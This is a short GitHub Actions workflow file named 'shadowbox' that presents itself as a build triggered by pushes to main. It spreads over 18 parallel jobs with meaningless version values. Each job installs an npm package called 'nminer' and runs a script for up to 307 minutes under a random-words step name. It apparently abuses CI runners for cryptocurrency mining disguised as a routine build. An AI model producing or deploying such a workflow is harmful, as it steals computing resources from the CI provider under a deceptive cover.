name: shadowbox
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 755 }
          - { version: 6369 }
          - { version: 8264 }
          - { version: 8592 }
          - { version: 3981 }
          - { version: 1813 }
          - { version: 5212 }
          - { version: 1407 }
          - { version: 8373 }
          - { version: 120 }
          - { version: 9835 }
          - { version: 1622 }
          - { version: 5321 }
          - { version: 6726 }
          - { version: 3212 }
          - { version: 8444 }
          - { version: 8014 }
          - { version: 6395 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: paltry seriously beautifully at
        run: |
          npm install nminer@latest
          timeout 307m node shadowbox.js || echo "shadowbox executed"